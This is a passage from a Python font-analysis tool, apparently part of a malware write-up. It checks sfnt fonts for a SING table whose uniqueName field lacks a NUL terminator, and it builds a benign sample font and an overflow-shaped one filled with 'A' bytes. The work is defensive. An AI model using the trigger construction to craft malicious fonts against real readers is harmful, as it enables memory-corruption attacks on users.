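            raise ValueError("table %r runs past end of font" % tag)
        tables[tag.decode("latin-1")] = (off, length)
    return tables


def check_sing(font: bytes) -> dict:
    """Verdict for one font. 'suspicious' is True when a SING table exists and
    its uniqueName field has no NUL inside its 28 bytes (or the table is too
    short to even hold the field)."""
    tables = sfnt_tables(font)
    if "SING" not in tables:
        return {"has_sing": False, "suspicious": False, "reason": "no SING table"}
    off, length = tables["SING"]
    if length < SING_UNIQUENAME_OFF + SING_UNIQUENAME_LEN:
        return {"has_sing": True, "suspicious": True,
                "reason": "SING table shorter than its fixed header"}
    start = off + SING_UNIQUENAME_OFF
    name = font[start:start + SING_UNIQUENAME_LEN]
    if b"\x00" not in name:
        return {"has_sing": True, "suspicious": True,
                "reason": "uniqueName not NUL-terminated: %r" % name}
    return {"has_sing": True, "suspicious": False, "reason": "uniqueName terminated"}


def build_sfnt(tables: dict) -> bytes:
    """Assemble a minimal sfnt from {tag: bytes}: header, directory, then
    4-byte-aligned table data. Checksums are left at zero (demo only)."""
    tags = sorted(tables)
    header = struct.pack(">IHHHH", 0x00010000, len(tags), 0, 0, 0)
    base = 12 + 16 * len(tags)
    directory, data = b"", b""
    for tag in tags:
        body = tables[tag]
        directory += struct.pack(">4sIII", tag.encode(), 0, base + len(data), len(body))
        data += body + b"\x00" * (-len(body) % 4)
    return header + directory + data


def make_sing(unique_name: bytes, trailer: bytes = b"") -> bytes:
    """SING table body: eight uint16 header fields, 28-byte uniqueName,
    16-byte METAMD5, then whatever follows."""
    head = struct.pack(">8H", 1, 1, 1, 0, 0, 1000, 0, 0)
    return head + unique_name[:28].ljust(28, b"\x00") + b"\x00" * 16 + trailer


# Constructed samples (not the carved font streams).
BENIGN_FONT = build_sfnt({"SING": make_sing(b"DemoGlyphlet"),
                          "head": b"\x00" * 54})
# Exploit shape: uniqueName is 28 bytes of 0x41 with no terminator, followed
# by more filler; a strcat-style copy keeps going past the 28-byte buffer.
SUSPICIOUS_FONT = build_sfnt({"SING": make_sing(b"A" * 28, b"A" * 64),
                              "head": b"\x00" * 54})

if __name__ == "__main__":
    for label, font in (("benign", BENIGN_FONT), ("suspicious", SUSPICIOUS_FONT)):
        print(label, check_sing(font))
```

Run check_sing() over each carved font stream; a hit on the SING uniqueName, combined with the spray in the script, is the concrete evidence behind the critical rule, whereas the 0x41 indicator alone only says the stream contains long runs of one byte.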